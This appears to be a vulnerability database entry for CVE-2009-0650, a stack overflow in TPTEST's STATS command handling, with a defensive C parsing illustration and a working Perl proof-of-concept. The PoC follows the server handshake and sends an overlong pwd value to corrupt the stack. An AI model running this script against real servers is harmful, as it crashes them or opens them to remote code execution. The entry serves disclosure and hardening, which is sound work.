TPTEST GetStatsFromLine() Remote Stack Overflow Vulnerability

Vulnerability ID: 1117403    Type: buffer overflow
Published: 2009-02-16    Updated: 2009-02-23
CVE ID: CVE-2009-0650    CNNVD ID: CNNVD-200902-472
Platform: Windows    CVSS score: 10.0
|Vulnerability sources
https://www.exploit-db.com/exploits/8058
https://cxsecurity.com/issue/WLB-2009020237
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-472
|Vulnerability details
TPTEST is a tool for measuring Internet connection speed. The GetStatsFromLine() function in engine/tpcommon.c (or src/net/tpcommon.cpp) contains a stack-based buffer overflow in its handling of the STATS command. A remote attacker who sends the server a STATS line carrying an overly long email or pwd tag value can trigger the overflow and execute arbitrary code. As the PoC below shows, no credentials are required: the only session state the STATS line depends on is the cookie and protocol version numbers that the server itself announces in its banner, followed by one TEST request.
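The parsing pattern the description points at, as an added illustration written for this page (it is not TPTEST's own code, which is not reproduced here): a tokenizer for the "key=value;" STATS format that locates the email and pwd values, a check that reports whether an unbounded copy of a value into a fixed stack buffer would overflow (the condition the PoC's 42-byte pwd= value creates), and a bounded extraction that rejects overlong values instead of copying them. The buffer sizes EMAIL_MAX and PWD_MAX are assumed for the example, and both sample STATS lines are constructed, the first mirroring the PoC's pwd value.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Buffer sizes are ASSUMED for illustration; the page does not state the
 * real TPTEST buffer sizes. */
#define EMAIL_MAX 64
#define PWD_MAX   32

/* Locate `tag` in a "key=value;key=value;..." line (the TPTEST STATS format).
 * Returns 1 and sets *val/*len to the value (not copied, not NUL-terminated),
 * or 0 if the tag is absent. Pairs end at ';', the line at CR/LF/NUL. */
static int find_tag(const char *line, const char *tag,
                    const char **val, size_t *len)
{
    size_t tlen = strlen(tag);
    const char *p = line;
    const char *sp = strchr(line, ' ');     /* skip the "STATS " command word */
    if (sp) p = sp + 1;

    while (*p && *p != '\r' && *p != '\n') {
        const char *end = p;                /* end of this key=value pair */
        while (*end && *end != ';' && *end != '\r' && *end != '\n') end++;
        const char *eq = memchr(p, '=', (size_t)(end - p));
        if (eq && (size_t)(eq - p) == tlen && memcmp(p, tag, tlen) == 0) {
            *val = eq + 1;
            *len = (size_t)(end - (eq + 1));
            return 1;
        }
        if (*end != ';') break;
        p = end + 1;
    }
    return 0;
}

/* What an unbounded copy (strcpy/sprintf into a bufsz-byte stack buffer)
 * would do with this line: 1 if value plus NUL does not fit, else 0. */
int field_would_overflow(const char *line, const char *tag, size_t bufsz)
{
    const char *v; size_t n;
    if (!find_tag(line, tag, &v, &n)) return 0;
    return n + 1 > bufsz;
}

/* Hardened extraction: copy only when the value fits, otherwise reject.
 * Returns 1 copied, 0 tag absent, -1 value too long (caller drops the line). */
int get_stat_field(const char *line, const char *tag, char *out, size_t outsz)
{
    const char *v; size_t n;
    if (!find_tag(line, tag, &v, &n)) return 0;
    if (n + 1 > outsz) return -1;
    memcpy(out, v, n);
    out[n] = '\0';
    return 1;
}

struct stats_creds { char email[EMAIL_MAX]; char pwd[PWD_MAX]; };

/* Parse both credential tags; reject the whole line if either overflows.
 * Returns 1 on success, -1 if the line must be discarded. */
int parse_stats_creds(const char *line, struct stats_creds *c)
{
    c->email[0] = '\0';
    c->pwd[0] = '\0';
    int e = get_stat_field(line, "email", c->email, sizeof c->email);
    int p = get_stat_field(line, "pwd", c->pwd, sizeof c->pwd);
    return (e < 0 || p < 0) ? -1 : 1;
}

/* Constructed sample lines (not captured traffic). The first carries the
 * PoC's pwd= value of 42 'A's; the second is a benign STATS line. */
const char POC_STATS_LINE[] =
    "STATS majorv=3;minorv=1;pktssent=0;bytessent=51200;email=;pwd="
    "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AA" "\r\n";
const char BENIGN_STATS_LINE[] =
    "STATS majorv=3;minorv=1;pktssent=0;email=user@example.org;pwd=secret\r\n";

int main(void)
{
    struct stats_creds c;
    int overflow = field_would_overflow(POC_STATS_LINE, "pwd", PWD_MAX);
    int rc = parse_stats_creds(POC_STATS_LINE, &c);
    printf("PoC line: unbounded copy overflows=%d, bounded parse rc=%d\n", overflow, rc);
    rc = parse_stats_creds(BENIGN_STATS_LINE, &c);
    printf("benign line: rc=%d email=%s pwd=%s\n", rc, c.email, c.pwd);
    return 0;
}
```

Rejecting the line rather than truncating the value is deliberate: a bounded copy that silently truncates would stop the memory corruption but leave the server treating an attacker-chosen prefix as the credential, and would hide the fact that an out-of-protocol line arrived at all.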
|Exploit (PoC)
#!/usr/local/bin/perl

# TPTEST <= 3.1.7 (maybe also 5.0.2?)
# tptest.sourceforge.net
# stack-based buffer overflow PoC in server (client can also be exploited)
# author: ffwd

use strict;
use warnings;
use IO::Socket;

my ($host, $port) = @ARGV;
die "usage: $0 <host> <port>\n" unless defined $host && defined $port;

# Control connection to the TPTEST server.
my $rem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port);
if (!$rem) { die "1\n"; }
$rem->autoflush(1);

# Defaults, replaced by whatever the server banner advertises.
my ($cookie, $major, $minor) = ("123", "123", "123");
my $r = <$rem>;
print "$r";
sleep 5;   # to attach in gdb..
if ($r =~ /cookie=([0-9]*)/) { $cookie = $1; }
if ($r =~ /vmajor=([0-9]*)/) { $major  = $1; }
if ($r =~ /vminor=([0-9]*)/) { $minor  = $1; }

# Start a test session so the server accepts a STATS line afterwards.
my $s = "TEST vmajor=$major;vminor=$minor;mode=4;timeout=60;tcpbytes=0;cookie=$cookie;client=\r\n";
print "$s";
print $rem "$s";
my $rr = <$rem>;
print "$rr";

# The server replies with a TCP data port; connect to it so the session proceeds.
my $remm;
if ($rr =~ /^210 tcpdataport=([0-9]*)/) {
    my $data = $1;
    $remm = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $data);
    if (!$remm) { die "2\n"; }
}

# STATS line whose pwd= value is longer than the server's stack buffer.
my $ss = "STATS majorv=$major;minorv=$minor;pktssent=0;pktsunsent=0;pktsrcvd=0;bytessent=51200;bytesrcvd=0;"
       . "maxrtt=0;minrtt=999999999;totrtt=0;nortt=0;oocount=0;txstart_s=7274757975;txstart_us=717574;"
       . "txstop_s=7274757975;txstop_us=717173;rxstart_s=0;rxstart_us=0;rxstop_s=0;rxstop_us=0;email=;pwd="
       . ("A" x 42) . "\r\n";   # buffer overflow!
print "$ss";
print $rem "$ss";
print while <$rem>;

# milw0rm.com [2009-02-16]
|References

Source: XF
Name: tptest-pwd-bo(48781)
Link: http://xforce.iss.net/xforce/xfdb/48781
Source: BID
Name: 33785
Link: http://www.securityfocus.com/bid/33785
Source: MILW0RM
Name: 8058
Link: http://www.milw0rm.com/exploits/8058
Source: SECUNIA
Name: 33972
Link: http://secunia.com/advisories/33972